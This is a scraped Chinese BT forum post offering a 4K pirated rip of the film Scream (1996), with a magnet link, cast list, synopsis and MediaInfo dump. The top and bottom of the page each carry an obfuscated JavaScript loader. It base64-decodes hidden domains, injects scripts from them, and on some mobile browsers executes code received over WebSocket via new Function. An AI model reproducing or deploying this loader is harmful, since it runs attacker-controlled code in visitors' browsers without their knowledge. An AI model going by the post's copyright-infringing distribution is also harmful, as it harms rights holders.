惊声尖叫[中文字幕].Scream.1996.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit 12.22GB

版主小s 1月前 208

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 惊声尖叫 / 夺命狂呼(港) / 尖叫

◎片 名 Scream

◎年 代 1996

◎产 地 美国

◎类 别 悬疑 / 恐怖 / 犯罪

◎语 言 英语

◎上映日期 1996-12-20

◎IMDb链接 https://www.imdb.com/title/tt0117571/

◎豆瓣评分 7.1/10 (43933人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301630/

◎片 长 111 分钟

◎导 演 韦斯·克雷文 Wes Craven (id:1025221)

◎编 剧 凯文·威廉姆森 Kevin Williamson (id:1032153)

◎演 员 内芙·坎贝尔 Neve Campbell (id:1027828)

斯基特·乌尔里奇 Skeet Ulrich (id:1004631)

柯特妮·考克斯 Courteney Cox (id:1040995)

大卫·阿奎特 David Arquette (id:1049510)

德鲁·巴里摩尔 Drew Barrymore (id:1054525)

马修·里沃德 Matthew Lillard (id:1004615)

Joseph Whipp Joseph Whipp (id:1166161)

Lisa Beach Lisa Beach (id:1278137)

丽莎·坎宁 Lisa Canning (id:1071723)

Troy Bishop Troy Bishop (id:1055721)

琳达·布莱尔 Linda Blair (id:1007024)

杰米·肯尼迪 Jamie Kennedy (id:1019042)

弗兰西斯·李·麦克凯恩 Frances Lee McCain (id:1022893)

韦斯·克雷文 Wes Craven (id:1025221)

列维·施瑞博尔 Liev Schreiber (id:1027151)

亨利·温克勒 Henry Winkler (id:1041140)

罗丝·麦高恩 Rose McGowan (id:1049504)

W·厄尔·布朗 W. Earl Brown (id:1049772)

哈维·韦恩斯坦 Harvey Weinstein (id:1054304)

Cathy Konrad Cathy Konrad (id:1288878)

卡里·伍兹 Cary Woods (id:1301251)

鲍伯·韦恩斯坦 Bob Weinstein (id:1300654)

玛丽安·马达莱娜 Marianne Maddalena (id:1290689)

Julee Cruise Julee Cruise (id:1077038)

马可·贝尔崔米 Marco Beltrami (id:1027998)

Mark Irwin Mark Irwin (id:1025459)

帕特里克·卢西尔 Patrick Lussier (id:1315802)

Lisa Beach Lisa Beach (id:1278137)

芭芭拉·奥尔维拉 Barbara Olvera (id:1293578)

罗伯特库兹曼 Robert Kurtzman (id:1036962)

Carol Schwartz Carol Schwartz (id:1297008)

霍华德·伯杰 Howard Berger (id:1278442)

格里高利·尼克特洛 Gregory Nicotero (id:1128804)

◎标 签 惊悚 / 恐怖 / 美国 / 悬疑 / 美国电影 / 1996 / 犯罪 / 恐怖电影

◎简 介

锡德尼?普雷斯科特(内芙?坎贝尔饰)的母亲去世一周年,这个本该平静的加州小镇变成了一片血海!两名学生被残忍地杀害,凶手是一位带着面具的恐怖片爱好者。警方将锡德尼的男友比尔?卢米斯(斯基特?乌尔里奇饰)定为嫌疑犯,并予以逮捕。但这时又有命案发生!神出鬼没的面具凶手仿佛死神般带走一个又一个生命,但凶手的真面目却无人知晓。夜幕降临,凶手将锡德尼身边的人一个个杀害,而被害人只能在被害前惊声尖叫。谁能够从凶手的刀下躲过,谁能揭开凶手的面具呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 228409043274778547037219884507234688696 (0xABD5FB4A36EA5327B402047B94A9DEB8)

  4. Complete name : [email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.2 GiB

  8. Duration : 1 h 51 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.8 Mb/s

  11. Movie name : Scream 1996 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]

  12. Encoded date : UTC 2021-10-26 11:44:23

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 51 min

  23. Bit rate : 12.0 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 632 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.080

  33. Stream size : 9.29 GiB (76%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : DTS XLL

  49. Format/Info : Digital Theater Systems

  50. Commercial name : DTS-HD Master Audio

  51. Codec ID : A_DTS

  52. Duration : 1 h 51 min

  53. Bit rate mode : Variable

  54. Bit rate : 3 718 kb/s

  55. Channel(s) : 6 channels

  56. Channel layout : C L R Ls Rs LFE

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 93.750 FPS (512 SPF)

  59. Bit depth : 24 bits

  60. Compression mode : Lossless

  61. Stream size : 2.88 GiB (24%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No


  66. Text #1

  67. ID : 3

  68. Format : PGS

  69. Muxing mode : zlib

  70. Codec ID : S_HDMV/PGS

  71. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration : 1 h 43 min

  73. Bit rate : 42.8 kb/s

  74. Count of elements : 2928

  75. Stream size : 31.7 MiB (0%)

  76. Title : ENG

  77. Language : English

  78. Default : Yes

  79. Forced : No


  80. Text #2

  81. ID : 4

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 43 min

  87. Bit rate : 37.5 kb/s

  88. Count of elements : 2974

  89. Stream size : 27.8 MiB (0%)

  90. Title : CHS

  91. Language : Chinese

  92. Default : No

  93. Forced : No


  94. Text #3

  95. ID : 5

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 43 min

  101. Bit rate : 38.3 kb/s

  102. Count of elements : 2974

  103. Stream size : 28.4 MiB (0%)

  104. Title : CHT

  105. Language : Chinese

  106. Default : No

  107. Forced : No


  108. Menu

  109. 00:00:00.000 : en:Chapter 01

  110. 00:00:18.809 : en:Chapter 02

  111. 00:12:59.528 : en:Chapter 03

  112. 00:18:43.079 : en:Chapter 04

  113. 00:33:08.027 : en:Chapter 05

  114. 00:35:57.780 : en:Chapter 06

  115. 00:37:13.688 : en:Chapter 07

  116. 00:40:05.443 : en:Chapter 08

  117. 00:51:15.489 : en:Chapter 09

  118. 01:04:27.237 : en:Chapter 10

  119. 01:13:07.131 : en:Chapter 11

  120. 01:19:49.283 : en:Chapter 12

  121. 01:27:02.050 : en:Chapter 13

  122. 01:34:41.300 : en:Chapter 14

  123. 01:36:28.198 : en:Chapter 15

  124. 01:38:04.086 : en:Chapter 16




复制代码


TAGS 恐怖 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:334F45D1A5CFBC42A7804046894F19742D08ED10

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};